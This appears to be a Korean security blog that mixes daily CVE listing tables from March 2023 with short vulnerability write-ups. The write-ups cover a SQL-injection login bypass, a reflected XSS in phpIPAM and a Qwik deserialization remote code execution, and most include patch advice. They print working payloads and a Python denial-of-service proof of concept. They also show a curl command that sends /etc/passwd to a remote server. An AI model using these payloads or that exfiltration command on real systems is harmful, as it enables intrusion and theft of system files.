반응형
datetime subject id link
2023-03-18 00:00:05.272886 (WordPress, SQL injection) CVE-2023-1471 https://cve.report/CVE-2023-1471
2023-03-18 00:00:05.273781 (WordPress) CVE-2023-1470 https://cve.report/CVE-2023-1470
2023-03-18 00:00:05.274610 (XSS) CVE-2022-45817 https://cve.report/CVE-2022-45817
2023-03-18 00:00:05.275285 (XSS) CVE-2022-45814 https://cve.report/CVE-2022-45814
2023-03-18 00:00:05.276098 (XSS) CVE-2022-43461 https://cve.report/CVE-2022-43461
2023-03-18 01:00:03.379755 (PHP, SQL injection, Critical) CVE-2023-1475 https://cve.report/CVE-2023-1475
2023-03-18 01:00:03.380388 (PHP, SQL injection, Critical) CVE-2023-1474 https://cve.report/CVE-2023-1474
2023-03-18 01:00:03.455022 (WordPress) CVE-2023-1472 https://cve.report/CVE-2023-1472
2023-03-18 06:00:05.680116 (Kubernetes) CVE-2023-27593 https://cve.report/CVE-2023-27593
2023-03-18 07:54:04.238858 (Remote Code Execution, Laravel, PHP) CVE-2023-28115 https://cve.report/CVE-2023-28115
2023-03-18 07:54:04.239418 (Kubernetes) CVE-2023-27595 https://cve.report/CVE-2023-27595
2023-03-18 07:54:04.239972 (Command Injection, Arbitrary Command) CVE-2023-27253 https://cve.report/CVE-2023-27253
2023-03-18 14:00:03.263511 (Squid, XSS) CVE-2023-24278 https://cve.report/CVE-2023-24278
2023-03-18 19:00:02.658682 (PHP) CVE-2023-1481 https://cve.report/CVE-2023-1481
2023-03-18 19:00:02.659181 (PHP, SQL injection, Critical) CVE-2023-1480 https://cve.report/CVE-2023-1480
2023-03-18 19:00:02.659678 (PHP, Critical) CVE-2023-1479 https://cve.report/CVE-2023-1479
2023-03-18 20:00:02.867187 (Critical) CVE-2023-1484 https://cve.report/CVE-2023-1484
2023-03-18 20:00:02.867698 (SQL injection, Critical) CVE-2023-1483 https://cve.report/CVE-2023-1483
2023-03-18 20:00:02.868245 (PHP, Code Injection) CVE-2023-1482 https://cve.report/CVE-2023-1482
반응형
반응형

ref

배경

  • Graduate Tracer System 은 학적을 관리하는 시스템이다.
  • Graduate Tracer System 1.0에서 sqli 취약성이 발견되었습니다. 영향을 받는 것은 admin/adminlog.php 파일의 함수이다다. 사용자가 파라미터를 조작하면 SQL 주입이 발생한다. 원격으로 공격이 가능하며, 관리자권한으로 접근 및 명령어 실행이 가능한 취약점이다. 취약성에 대한 공격 방안은 공개가 되어 있습니다.

분석

  • 이 프로그램은 phpstudy 8.1.1.3 을 기반으로 하고 있다.
  • Vulnerability File: tracking/admin/adminlog.php
  • Vulnerability location: tracking/admin/adminlog.php user
  • 로그인시 사용하는 user=* [+] Payload: 파라미터에 페이로드로 공격이 가능하다.

테스트

  1. 관리자 로그인 페이지로 접근
  2. 아이디 부분에 payload를 입력 admin%27 ‘1’=’1 입력
  3. prepared statement 사용하지 않고, 파라미터를 그대로 쿼리스트링의 변수로 받기 때문에 취약성이 발생 slq = select * from xxx where user = ‘admin’ or ‘1’=’1’ and xxx
<?php include('dbcon.php');
 session_start();
if (isset($_POST['submit'])){	
$user = $_POST['user'];
$password = sha1($_POST['password']);

        **$sql = "select * from adminuser where user = '$user' and password = '$password'";**
        $result = mysqli_query($conn,$sql);
                        if ($result->num_rows> 0){
                        $row = mysqli_fetch_assoc($result);
                        $_SESSION['id'] = $row['id'];
                        header("Location:homead.php");
      }else{
                            echo "<script>alert('Mali!! ang iyong user o password na nalagay paki-ulit muli.')</script>";
                        }

}?>

패치 방법

  • 패치 제공하지 않음
  • prepared statement로 변경 후 가동
$stmt = $conn->prepare("**select * from adminuser where user = ? and password = ?**");
$stmt->bind_param("ss", $user, $password);
반응형
반응형
datetime subject id link
2023-03-17 01:00:03.375156 (Remote Attack) CVE-2023-27789 https://cve.report/CVE-2023-27789
2023-03-17 01:00:03.375726 (Remote Attack) CVE-2023-27788 https://cve.report/CVE-2023-27788
2023-03-17 01:00:03.376233 (Remote Attack) CVE-2023-27787 https://cve.report/CVE-2023-27787
2023-03-17 01:00:03.376771 (Remote Attack) CVE-2023-27786 https://cve.report/CVE-2023-27786
2023-03-17 01:00:03.377284 (Remote Attack) CVE-2023-27785 https://cve.report/CVE-2023-27785
2023-03-17 01:00:03.377797 (Remote Attack) CVE-2023-27784 https://cve.report/CVE-2023-27784
2023-03-17 01:00:03.378317 (Remote Attack) CVE-2023-27783 https://cve.report/CVE-2023-27783
2023-03-17 01:00:03.378834 (Remote Attack, PHP) CVE-2023-27711 https://cve.report/CVE-2023-27711
2023-03-17 01:00:03.379339 (Remote Attack, PHP, SQL injection) CVE-2023-27709 https://cve.report/CVE-2023-27709
2023-03-17 01:00:03.379859 (Remote Attack, PHP, SQL injection) CVE-2023-27707 https://cve.report/CVE-2023-27707
2023-03-17 01:00:03.380362 (Remote Attack) CVE-2023-27131 https://cve.report/CVE-2023-27131
2023-03-17 01:00:03.380876 (Remote Attack) CVE-2023-27130 https://cve.report/CVE-2023-27130
2023-03-17 01:00:03.381375 (Remote Code Execution, PHP) CVE-2023-27037 https://cve.report/CVE-2023-27037
2023-03-17 01:00:03.381894 (Remote Attack) CVE-2023-26769 https://cve.report/CVE-2023-26769
2023-03-17 01:00:03.455557 (Remote Attack) CVE-2023-26768 https://cve.report/CVE-2023-26768
2023-03-17 01:00:03.456167 (Remote Attack) CVE-2023-26767 https://cve.report/CVE-2023-26767
2023-03-17 02:00:03.599063 (GraphQL) CVE-2023-28104 https://cve.report/CVE-2023-28104
2023-03-17 02:00:03.599937 (Remote Code Execution) CVE-2023-27040 https://cve.report/CVE-2023-27040
2023-03-17 03:00:04.665399 (Docker) CVE-2023-28109 https://cve.report/CVE-2023-28109
2023-03-17 03:00:04.666091 (PHP, SQL injection) CVE-2023-27041 https://cve.report/CVE-2023-27041
2023-03-17 03:00:04.666687 (Kubernetes) CVE-2023-28110 https://cve.report/CVE-2023-28110
2023-03-17 06:00:05.259798 (Code Injection) CVE-2023-0598 https://cve.report/CVE-2023-0598
2023-03-17 07:00:04.967244 (XSS) CVE-2023-27494 https://cve.report/CVE-2023-27494
2023-03-17 07:00:04.969417 (Remote Code Execution) CVE-2022-43605 https://cve.report/CVE-2022-43605
2023-03-17 07:00:04.970018 (Remote Code Execution) CVE-2022-43604 https://cve.report/CVE-2022-43604
2023-03-17 07:00:04.970580 (sqlite) CVE-2022-43441 https://cve.report/CVE-2022-43441
2023-03-17 08:00:07.178085 (XSS) CVE-2023-27059 https://cve.report/CVE-2023-27059
2023-03-17 14:00:04.465122 (OpenSSH) CVE-2023-28531 https://cve.report/CVE-2023-28531
2023-03-17 17:00:05.775902 (PHP, SQL injection, Critical) CVE-2023-1455 https://cve.report/CVE-2023-1455
2023-03-17 17:00:05.776520 (SQL injection, Critical) CVE-2023-1454 https://cve.report/CVE-2023-1454
2023-03-17 17:00:05.777117 (Critical) CVE-2023-1453 https://cve.report/CVE-2023-1453
2023-03-17 17:00:05.777741 (Critical) CVE-2023-1452 https://cve.report/CVE-2023-1452
2023-03-17 17:00:05.855049 (Critical) CVE-2023-1444 https://cve.report/CVE-2023-1444
2023-03-17 17:00:05.855813 (PHP) CVE-2023-1442 https://cve.report/CVE-2023-1442
2023-03-17 17:00:05.856393 (PHP, SQL injection, Critical) CVE-2023-1441 https://cve.report/CVE-2023-1441
2023-03-17 17:00:05.857352 (PHP, SQL injection, Critical) CVE-2023-1440 https://cve.report/CVE-2023-1440
2023-03-17 17:00:05.858000 (PHP, SQL injection, Critical) CVE-2023-1439 https://cve.report/CVE-2023-1439
2023-03-17 18:00:05.672265 (PHP, Critical) CVE-2023-1460 https://cve.report/CVE-2023-1460
2023-03-17 18:00:05.673872 (PHP, SQL injection, Critical) CVE-2023-1459 https://cve.report/CVE-2023-1459
2023-03-17 19:00:04.374013 (PHP, SQL injection, Critical) CVE-2023-1461 https://cve.report/CVE-2023-1461
2023-03-17 19:00:04.374641 (SQL injection) CVE-2023-1152 https://cve.report/CVE-2023-1152
2023-03-17 21:00:06.073189 (GitHub) CVE-2023-1463 https://cve.report/CVE-2023-1463
2023-03-17 22:00:04.778266 (SQL injection, Critical) CVE-2023-1468 https://cve.report/CVE-2023-1468
2023-03-17 22:00:04.778911 (PHP, Critical) CVE-2023-1467 https://cve.report/CVE-2023-1467
2023-03-17 22:00:04.854546 (SQL injection, Critical) CVE-2023-1466 https://cve.report/CVE-2023-1466
2023-03-17 22:00:04.855390 (PHP, Critical) CVE-2023-1464 https://cve.report/CVE-2023-1464
2023-03-17 23:00:04.871377 (WordPress) CVE-2023-1469 https://cve.report/CVE-2023-1469
2023-03-17 23:00:04.872051 (WordPress) CVE-2023-1172 https://cve.report/CVE-2023-1172
반응형
반응형
datetime subject id link
2023-03-16 00:00:05.676810 (Apache Tomcat) CVE-2023-0100 https://cve.report/CVE-2023-0100
2023-03-16 00:00:05.677639 (SQL injection) CVE-2023-24732 https://cve.report/CVE-2023-24732
2023-03-16 00:00:05.678085 (SQL injection) CVE-2023-24731 https://cve.report/CVE-2023-24731
2023-03-16 00:00:05.678791 (SQL injection) CVE-2023-24730 https://cve.report/CVE-2023-24730
2023-03-16 00:00:05.679308 (SQL injection) CVE-2023-24729 https://cve.report/CVE-2023-24729
2023-03-16 00:00:05.679947 (SQL injection) CVE-2023-24728 https://cve.report/CVE-2023-24728
2023-03-16 00:00:05.754858 (SQL injection) CVE-2023-24726 https://cve.report/CVE-2023-24726
2023-03-16 01:00:03.095222 (SQL injection) CVE-2022-44580 https://cve.report/CVE-2022-44580
2023-03-16 02:00:03.060054 (PHP) CVE-2023-1418 https://cve.report/CVE-2023-1418
2023-03-16 02:00:03.060588 (PHP, SQL injection, Critical) CVE-2023-1416 https://cve.report/CVE-2023-1416
2023-03-16 02:00:03.061097 (PHP, Critical) CVE-2023-1415 https://cve.report/CVE-2023-1415
2023-03-16 02:00:03.061628 (PHP, SQL injection, Critical) CVE-2023-1379 https://cve.report/CVE-2023-1379
2023-03-16 02:00:03.062125 (XSS) CVE-2022-37402 https://cve.report/CVE-2022-37402
2023-03-16 04:00:04.571689 (nginx) CVE-2023-25804 https://cve.report/CVE-2023-25804
2023-03-16 04:00:04.572155 (Command Injection) CVE-2023-24229 https://cve.report/CVE-2023-24229
2023-03-16 06:00:06.078321 (XSS) CVE-2023-26912 https://cve.report/CVE-2023-26912
2023-03-16 07:00:06.163612 (Kubernetes, Critical) CVE-2023-26484 https://cve.report/CVE-2023-26484
2023-03-16 09:00:06.355160 (Remote Code Execution) CVE-2023-28461 https://cve.report/CVE-2023-28461
2023-03-16 09:00:06.356189 (Command Injection, Remote Attack) CVE-2023-28460 https://cve.report/CVE-2023-28460
2023-03-16 09:00:06.358310 (Command Injection) CVE-2023-1389 https://cve.report/CVE-2023-1389
2023-03-16 09:00:06.358937 (Arbitrary Command) CVE-2022-4313 https://cve.report/CVE-2022-4313
2023-03-16 11:00:05.857071 (XSS) CVE-2023-26951 https://cve.report/CVE-2023-26951
2023-03-16 11:00:05.857683 (Command Injection) CVE-2023-25280 https://cve.report/CVE-2023-25280
2023-03-16 12:00:07.555624 (PHP, SQL injection) CVE-2023-26784 https://cve.report/CVE-2023-26784
2023-03-16 12:00:07.556107 (Command Execution) CVE-2023-24795 https://cve.report/CVE-2023-24795
2023-03-16 12:00:07.556611 (Remote Attack) CVE-2023-24760 https://cve.report/CVE-2023-24760
2023-03-16 19:00:04.877055 (XSS) CVE-2022-40699 https://cve.report/CVE-2022-40699
2023-03-16 19:00:04.877582 (XSS) CVE-2022-38971 https://cve.report/CVE-2022-38971
2023-03-16 20:00:05.179500 (XSS) CVE-2022-41554 https://cve.report/CVE-2022-41554
2023-03-16 22:00:04.871453 (GitHub, XSS) CVE-2023-1429 https://cve.report/CVE-2023-1429
2023-03-16 22:00:04.872009 (Arbitrary Command) CVE-2023-24671 https://cve.report/CVE-2023-24671
2023-03-16 23:00:04.968759 (PHP, SQL injection) CVE-2023-27250 https://cve.report/CVE-2023-27250
2023-03-16 23:00:04.969330 (PHP) CVE-2023-1433 https://cve.report/CVE-2023-1433
2023-03-16 23:00:04.969910 (PHP, Critical) CVE-2023-1432 https://cve.report/CVE-2023-1432
2023-03-16 23:00:04.970505 (WordPress) CVE-2023-1431 https://cve.report/CVE-2023-1431
반응형
반응형

ref

배경

  • pipipam 은 open-source web IP address management application 이다.
  • phpipam v1.5 버젼에서 Reflected corss-site scripting공격이 가능한 파라미터가 발견되었다. 해당 파라미터는 closeClass 이고 /subnet-masks/popup.php. 엔트리에서 발견되었다.

분석

테스트

  1. 로그인을 수행
  2. 로그인 이후 아래 공격 코드를 url로 입력
[<https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=">](https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=%22%3E)alert("XSS>")

<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
  • 공격코드로 공격 수행시 브라우져 응답은 다음과 같다.
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>

패치 방법

반응형
반응형

 

datetime subject id link
2023-03-15 01:00:03.629320 (SQL injection) CVE-2023-27074 https://cve.report/CVE-2023-27074
2023-03-15 01:00:03.629865 (Critical) CVE-2023-1398 https://cve.report/CVE-2023-1398
2023-03-15 01:00:03.630307 (PHP) CVE-2023-1397 https://cve.report/CVE-2023-1397
2023-03-15 01:00:03.630776 (PHP) CVE-2023-1396 https://cve.report/CVE-2023-1396
2023-03-15 01:00:03.631229 (PHP) CVE-2023-1395 https://cve.report/CVE-2023-1395
2023-03-15 01:00:03.631665 (MySQL, PHP, SQL injection, Critical) CVE-2023-1394 https://cve.report/CVE-2023-1394
2023-03-15 01:00:03.632155 (Critical) CVE-2023-1392 https://cve.report/CVE-2023-1392
2023-03-15 01:00:03.632568 (PHP) CVE-2023-1391 https://cve.report/CVE-2023-1391
2023-03-15 02:00:03.310142 (XSS) CVE-2023-27070 https://cve.report/CVE-2023-27070
2023-03-15 02:00:03.310566 (XSS) CVE-2023-27069 https://cve.report/CVE-2023-27069
2023-03-15 03:00:04.001083 (Remote Code Execution) CVE-2023-24913 https://cve.report/CVE-2023-24913
2023-03-15 03:00:04.002028 (Remote Code Execution) CVE-2023-24907 https://cve.report/CVE-2023-24907
2023-03-15 03:00:04.002765 (Remote Code Execution) CVE-2023-24872 https://cve.report/CVE-2023-24872
2023-03-15 03:00:04.003239 (Remote Code Execution) CVE-2023-24869 https://cve.report/CVE-2023-24869
2023-03-15 03:00:04.003687 (Remote Code Execution) CVE-2023-24867 https://cve.report/CVE-2023-24867
2023-03-15 03:00:04.004528 (Remote Code Execution) CVE-2023-24909 https://cve.report/CVE-2023-24909
2023-03-15 03:00:04.004984 (Remote Code Execution) CVE-2023-24908 https://cve.report/CVE-2023-24908
2023-03-15 03:00:04.005456 (Remote Code Execution) CVE-2023-24876 https://cve.report/CVE-2023-24876
2023-03-15 03:00:04.005888 (Remote Code Execution) CVE-2023-24871 https://cve.report/CVE-2023-24871
2023-03-15 03:00:04.006270 (Remote Code Execution) CVE-2023-24868 https://cve.report/CVE-2023-24868
2023-03-15 03:00:04.006999 (SQL injection) CVE-2023-25206 https://cve.report/CVE-2023-25206
2023-03-15 03:00:04.007473 (Remote Code Execution) CVE-2023-23416 https://cve.report/CVE-2023-23416
2023-03-15 03:00:04.007902 (Remote Code Execution) CVE-2023-23415 https://cve.report/CVE-2023-23415
2023-03-15 03:00:04.008284 (Remote Code Execution) CVE-2023-23414 https://cve.report/CVE-2023-23414
2023-03-15 03:00:04.008644 (Remote Code Execution) CVE-2023-23413 https://cve.report/CVE-2023-23413
2023-03-15 03:00:04.009174 (HTTP.sys) CVE-2023-23410 https://cve.report/CVE-2023-23410
2023-03-15 03:00:04.009589 (Azure) CVE-2023-23408 https://cve.report/CVE-2023-23408
2023-03-15 03:00:04.010008 (Remote Code Execution) CVE-2023-23407 https://cve.report/CVE-2023-23407
2023-03-15 03:00:04.010382 (Remote Code Execution) CVE-2023-23406 https://cve.report/CVE-2023-23406
2023-03-15 03:00:04.010783 (Remote Code Execution) CVE-2023-23405 https://cve.report/CVE-2023-23405
2023-03-15 03:00:04.011189 (Remote Code Execution) CVE-2023-23404 https://cve.report/CVE-2023-23404
2023-03-15 03:00:04.011549 (Remote Code Execution) CVE-2023-23403 https://cve.report/CVE-2023-23403
2023-03-15 03:00:04.011969 (Remote Code Execution) CVE-2023-23402 https://cve.report/CVE-2023-23402
2023-03-15 03:00:04.012334 (Remote Code Execution) CVE-2023-23401 https://cve.report/CVE-2023-23401
2023-03-15 03:00:04.012688 (Remote Code Execution) CVE-2023-23400 https://cve.report/CVE-2023-23400
2023-03-15 03:00:04.013109 (Remote Code Execution) CVE-2023-23399 https://cve.report/CVE-2023-23399
2023-03-15 03:00:04.013773 (Remote Code Execution) CVE-2023-23392 https://cve.report/CVE-2023-23392
2023-03-15 03:00:04.014393 (Remote Code Execution) CVE-2023-21708 https://cve.report/CVE-2023-21708
2023-03-15 04:00:04.620937 (GraphQL) CVE-2023-27588 https://cve.report/CVE-2023-27588
2023-03-15 06:00:06.518784 (Command Injection, PHP) CVE-2023-28343 https://cve.report/CVE-2023-28343
2023-03-15 12:00:06.775986 (Remote Attack, PHP) CVE-2023-26511 https://cve.report/CVE-2023-26511
2023-03-15 12:00:06.776503 (File Upload) CVE-2023-26262 https://cve.report/CVE-2023-26262
2023-03-15 13:00:04.773870 (File Upload) CVE-2023-27757 https://cve.report/CVE-2023-27757
2023-03-15 15:00:04.972524 (PHP, File Upload) CVE-2023-27235 https://cve.report/CVE-2023-27235
2023-03-15 16:00:06.079322 (Command Injection) CVE-2023-27240 https://cve.report/CVE-2023-27240
2023-03-15 18:00:05.173922 (PHP, SQL injection, Critical) CVE-2023-1407 https://cve.report/CVE-2023-1407
2023-03-15 21:00:07.066053 (WordPress, Wordpress Plugin) CVE-2023-25708 https://cve.report/CVE-2023-25708
2023-03-15 22:00:04.554644 (XSS) CVE-2023-0322 https://cve.report/CVE-2023-0322

 

반응형
반응형

ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

배경

NodeJS기반의 Framework인 Qwik(https://github.com/BuilderIO/qwik)을 사용하는 서비스에서 Qwik의 버전이 0.20.1 이하일 경우 Preauth Remote Command Execution 공격이 가능합니다.

분석

  • 분석은 취약한 버전인 0.20.1으로 진행
  • Qwik의 middleware request handler는 다음과 같은 순서로 설정
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
  • securityMiddleware함수는 CSRF의 방지 목적으로 아래의 조건을 확인
    • request.headers.get(”origin”) == url.origin
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
  • pureServerFunction는 다음과 같은 조건을 통과할 경우 ev.parseBody 함수를 실행
  1. qfunc is defined in query
  2. X-QRL in header == qfunc in query
  3. Content-Type == application/qwik-json
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
  • SSR의 경우 DoS (poc)
import sys 
import requests 

host = sys.argv[1] 
headers = { "Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json" } 
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers) 
print(response.text)
  • 위의 조건이 맞으면 ev.parseBody() 함수내 실행
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
	// skip
	parseBody: async () => {
      if (requestData !== void 0) {
        return requestData;
      }
      return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
    },
	// skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
  • requestData가 undefined라면 parseRequest로 인자로 전달
  • 이때 content-type이 application/qwik-json이므로 qwikSerializer._deserializeData를 호출
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
  • 이 함수에서는 deserialize를 위한 Parser를 생성하고 reviveValue를 호출
  • Parser는 prepare, subs, fill 이 3가지 함수가 존재
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
					// skip
        },
        subs(obj, subs) {
					// skip
        },
        fill(obj, getObject) {
					// skip
        },
    };
};
  • reviveValues 함수는 다음과 같이 _obj의 타입이 “string”이고 값이 “\u0001”이 아니라면 parser의 prepare함수를 호출
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\\u0001"
        }
    }
  • prepare 함수에서는 _obj의 값 중 첫 Byte를 prefix값으로써 활용하고, 이 값과 맞는 serializers를 찾음
  • 일치하는 serializers가 존재한다면 _obj의 2번째 byte부터의 값을 첫 번째 인자로써 serializer의 prepare함수를 호출
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
  • Serializers의 리스트는 다음과 같고 이들은 각각 정의된 prefix값을 보유
// // qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
  • 이 중 PureFunctionSerializer를 참조
const PureFunctionSerializer = {
    prefix: '\\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
  • prefix는 \u0011이고 prepare함수는 인자값을 이용해 new Function 함수를 실행
  • 이때 원격으로 명령어 실행이 가능
    • exploit 비공개, @별도 연락 해주세요.
    • command
      • curl -F”a=@/etc/passwd” http://[remote_server]

패치 방법

반응형
반응형
datetime subject id link
2023-03-13 08:00:07.614784 (HashiCorp Vault) CVE-2023-24999 https://cve.report/CVE-2023-24999
2023-03-13 14:00:05.519906 (GitHub, SQL injection) CVE-2023-1361 https://cve.report/CVE-2023-1361
2023-03-13 14:00:05.520244 (GitHub) CVE-2023-1362 https://cve.report/CVE-2023-1362
2023-03-13 18:00:06.123354 (GitHub, Code Injection) CVE-2023-1367 https://cve.report/CVE-2023-1367
2023-03-13 18:00:06.123787 (PHP, SQL injection, Critical) CVE-2023-1365 https://cve.report/CVE-2023-1365
2023-03-13 18:00:06.124162 (PHP, SQL injection, Critical) CVE-2023-1364 https://cve.report/CVE-2023-1364
2023-03-13 19:00:03.812133 (PHP, SQL injection, Critical) CVE-2023-1368 https://cve.report/CVE-2023-1368
2023-03-13 19:00:03.812506 (PHP, SQL injection, Critical) CVE-2023-1366 https://cve.report/CVE-2023-1366
2023-03-13 22:00:04.108741 (Docker) CVE-2023-0629 https://cve.report/CVE-2023-0629
2023-03-13 22:00:04.109121 (Docker, Arbitrary Command) CVE-2023-0628 https://cve.report/CVE-2023-0628
2023-03-13 23:00:03.618408 (WordPress) CVE-2023-1374 https://cve.report/CVE-2023-1374
2023-03-13 23:00:03.618829 (WordPress) CVE-2023-1372 https://cve.report/CVE-2023-1372
반응형
반응형
datetime subject id link
2023-03-11 01:00:05.213381 (GitHub, XSS) CVE-2023-1315 https://cve.report/CVE-2023-1315
2023-03-11 01:00:05.213668 (XSS) CVE-2022-48111 https://cve.report/CVE-2022-48111
2023-03-11 02:00:04.116962 (File Upload) CVE-2023-27164 https://cve.report/CVE-2023-27164
2023-03-11 02:00:04.117348 (PHP, SQL injection, Critical) CVE-2023-1322 https://cve.report/CVE-2023-1322
2023-03-11 02:00:04.117639 (PHP, SQL injection, Critical) CVE-2023-1321 https://cve.report/CVE-2023-1321
2023-03-11 02:00:04.117972 (GitHub, XSS) CVE-2023-1320 https://cve.report/CVE-2023-1320
2023-03-11 02:00:04.118223 (GitHub, XSS) CVE-2023-1319 https://cve.report/CVE-2023-1319
2023-03-11 02:00:04.118457 (GitHub, XSS) CVE-2023-1318 https://cve.report/CVE-2023-1318
2023-03-11 02:00:04.118736 (GitHub, XSS) CVE-2023-1317 https://cve.report/CVE-2023-1317
2023-03-11 02:00:04.119016 (GitHub, XSS) CVE-2023-1316 https://cve.report/CVE-2023-1316
2023-03-11 06:00:04.201341 (WordPress) CVE-2023-1346 https://cve.report/CVE-2023-1346
2023-03-11 06:00:04.201828 (WordPress) CVE-2023-1345 https://cve.report/CVE-2023-1345
2023-03-11 06:00:04.202139 (WordPress) CVE-2023-1344 https://cve.report/CVE-2023-1344
2023-03-11 06:00:04.202463 (WordPress) CVE-2023-1343 https://cve.report/CVE-2023-1343
2023-03-11 06:00:04.213882 (WordPress) CVE-2023-1342 https://cve.report/CVE-2023-1342
2023-03-11 06:00:04.214260 (WordPress) CVE-2023-1341 https://cve.report/CVE-2023-1341
2023-03-11 06:00:04.214561 (WordPress) CVE-2023-1340 https://cve.report/CVE-2023-1340
2023-03-11 06:00:04.214903 (WordPress) CVE-2023-1339 https://cve.report/CVE-2023-1339
2023-03-11 06:00:04.215193 (WordPress) CVE-2023-1338 https://cve.report/CVE-2023-1338
2023-03-11 06:00:04.215469 (WordPress) CVE-2023-1337 https://cve.report/CVE-2023-1337
2023-03-11 06:00:04.215806 (WordPress) CVE-2023-1336 https://cve.report/CVE-2023-1336
2023-03-11 06:00:04.216097 (WordPress) CVE-2023-1335 https://cve.report/CVE-2023-1335
2023-03-11 06:00:04.216366 (WordPress) CVE-2023-1334 https://cve.report/CVE-2023-1334
2023-03-11 06:00:04.216636 (WordPress) CVE-2023-1333 https://cve.report/CVE-2023-1333
2023-03-11 07:00:05.203509 (Jenkins, XSS) CVE-2023-27905 https://cve.report/CVE-2023-27905
2023-03-11 07:00:05.203883 (Jenkins) CVE-2023-27904 https://cve.report/CVE-2023-27904
2023-03-11 07:00:05.204199 (Jenkins) CVE-2023-27903 https://cve.report/CVE-2023-27903
2023-03-11 07:00:05.204479 (Jenkins) CVE-2023-27902 https://cve.report/CVE-2023-27902
2023-03-11 07:00:05.204829 (Jenkins, Apache Commons FileUpload) CVE-2023-27901 https://cve.report/CVE-2023-27901
2023-03-11 07:00:05.205202 (Jenkins, Apache Commons FileUpload) CVE-2023-27900 https://cve.report/CVE-2023-27900
2023-03-11 07:00:05.205504 (Jenkins) CVE-2023-27899 https://cve.report/CVE-2023-27899
